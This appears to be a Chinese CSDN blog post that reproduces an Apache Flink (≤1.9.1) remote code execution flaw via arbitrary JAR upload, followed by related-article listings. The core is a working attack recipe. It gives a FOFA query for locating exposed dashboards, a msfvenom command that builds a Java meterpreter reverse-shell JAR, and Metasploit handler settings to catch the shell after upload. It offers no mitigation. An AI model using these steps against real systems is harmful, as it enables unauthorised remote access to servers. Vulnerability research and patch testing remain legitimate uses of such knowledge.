Apache Flink 小于1.9.1远程代码执行

最新推荐文章于 2024-05-22 16:44:14 发布
最新推荐文章于 2024-05-22 16:44:14 发布
阅读量171 收藏
点赞数
文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/132105174
版权

漏洞描述

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.

网络测绘

title="Apache-Flink"

漏洞复现

1.打开一个使用 Apache Flink 并且带有上传功能的网站

2.使用msf生成一个jar木马

msfvenom -p java/meterpreter/reverse_tcp LHOST=XXXX  LPORT=4444 -f jar > test.jar

3.点击 Add 上传 jar 文件

4.msf开启端口监听

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

5.点击下 submit 成功反弹回shell

恸.283
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dlink On Yarn 三种 Flink 执行方式的实践
张伟的专栏
04-07 701
进入集群中心进行远程集群的注册。Executor 是 Dlink 定制的 FlinkSQL 执行器,来模拟真实的 Flink 执行环境,负责 FlinkSQL 的 Catalog 管理、UDF管理、片段管理、配置管理、语句集管理、语法校验、逻辑验证、计划优化、生成 JobGraph、本地执行远程提交、SELECT 及 SHOW 预览等核心功能。JobManager 并非 Flink 的 JM,而是作为 Dlink 的作业管理入口,负责 Flink 的各种作业执行方式及其他功能的调度。
Flink初级编程实践(使用macOS上的IDEA远程调试服务器)——大数据基础编程实验之八
weixin_44616879的博客
10-10 5670
Flink初级编程实践——大数据基础编程实验之八 一、实验目的 (1)通过实验掌握基本的Flink编程方法。 (2)掌握用IntelliJ IDEA工具编写Flink程序的方法。 二、实验平台 (1)服务器 Ubuntu 16.04。 (2)个人电脑 macOS 10.15.6。 (3)IntelliJ IDEA 2021.2.2。 (4)Flink 1.9.1。 三、实验步骤 1.使用IntelliJ IDEA工具开发WordCount程序 在个人电脑macOS系统中安装IntelliJ IDEA,然后使
Flink 应用程序的远程运行和调优
互联网知识分享
08-19 239
应用程序的远程运行和调优的详细介绍。通过配置远程集群、优化资源配置、算子链和任务链,以及设置合适的并行度,可以提高应用程序的性能和稳定性。算子链优化是将多个算子合并为一个算子链,减少网络传输开销。在远程运行应用程序时,我们需要进行调优以提高应用程序的性能和稳定性。中,应用程序可以本地运行,也可以远程运行。在远程集群上运行应用程序时,可以通过设置资源配置参数来优化性能。使用合适的窗口操作符,如滑动窗口和会话窗口,以减少中间状态的存储和传输。启动完成后,集群将监听指定的地址和端口,等待应用程序提交。
Apache Flink (最新版本) 远程代码执行
众生度尽,方证菩提
05-04 688
路虽远,行则将至;事虽难,做则必成
Flink 代码方式提交程序到远程集群运行
热门推荐
吟啸徐行
04-18 2万+
在学习Flink时候,看到如下方法,可以获取到远程集群上的一个ExecutionEnvironment实例,便尝试使用一下,将本地IDE作业提交到集群运行,代码如下: def createRemoteEnvironment(host: String, port: Int, jarFiles: String*): ExecutionEnvironment 代码: pack
Apache Flink 未授权访问+远程代码执行
Birdman-one的博客
12-11 2020
Apache Flink 未授权访问+远程代码执行 作者:Birdman-one 前言 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 此次复现就是通过版本Version: 1.10.1进行复现利用。 FOFA FOFA 语句 app="Apache-Flink" && country="CN" app="Apache-Flink" && country="CN" &&am
xiejingjing1#PeiQi-WIKI-POC#Apache Flink 小于1.9.1远程代码执行 CVE-2020-
07-25
漏洞描述近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.漏洞影响国内还是很多使用 Apache Flink 的,大
Apache Flink 未授权访问+远程代码执行.pdf
04-30
Apache Flink 未授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
flink-1.9.1-bin-scala_2.11.tgz
02-26
flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz
[漏洞复现]Apache Flink未授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 2538
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
Apache Flink 未授权远程代码执行检查
weixin_42299610的博客
06-07 1673
Apache Flink 未授权远程代码执行检查
Apache Flink RCE 漏洞复现
weixin_44508748的博客
11-24 687
介绍 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
Apache Doris 2.1.3 版本正式发布!
SelectDB
05-22 793
确保用户定义的变量能够正确地传递到 Master 节点,以便在整个系统中保持一致性和正确的执行逻辑。
2024年3月小程序类目调整汇总公告
最新发布
weixin_44703272的博客
05-22 322
3、如提供时政信息服务,需补充【时政信息】类目4、如提供其他视频播放、观看等服务,需补充【文娱-其他视频】或【文娱-视频广场】类目5、微信公众平台微短剧小程序运营指引6、类目申请通过后,如需实现安卓等非iOS端的小程序内购买交易,开发者需配置接入小程序虚拟支付功能并通过该功能实现。⑪其他材料(pdf扫描件+加盖公章,如网络视听审核员证、参培证明材料、ICP备案、信息网络传播视听节目许可证、网络文化经营许可证、增值电信业务经营许可证、计算机软件著作权登记证书、重点作品、企业荣誉等)
apache BeanUtils
w_t_y_y的博客
05-20 132
一、populate
有趣的Decimal 类型 如何被 PostgreSQL 和 Apache-Arrow 实现
天行健,地势坤
05-19 689
近期工作中有涉及到我们 向量化引擎的 Decimal 数据类型和 PostgreSQL built-in Decimal 数据类型的兼容问题, 在此做一个体系化的梳理.
Apache arrow 极致模块化、可组合的数据平台
天行健,地势坤
05-19 823
Apache arrow 极致模块化、可组合的数据平台
SpringBoot和Apache Doris实现实时广告推荐系统
qq_30895747的博客
05-21 206
基于SpringBoot的实时广告推送系统
sudo mv ./ flink-1.9.1 ./flink mv: 目标'./flink' 不是目录
11-18
如果执行该命令时出现`mv: 目标'./flink' 不是目录`的错误,可能是因为当前目录下已经存在名为`flink`的文件,导致无法将`flink-1.9.1`目录重命名为`flink`。此时可以先删除当前目录下的`flink`文件,再重新执行`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值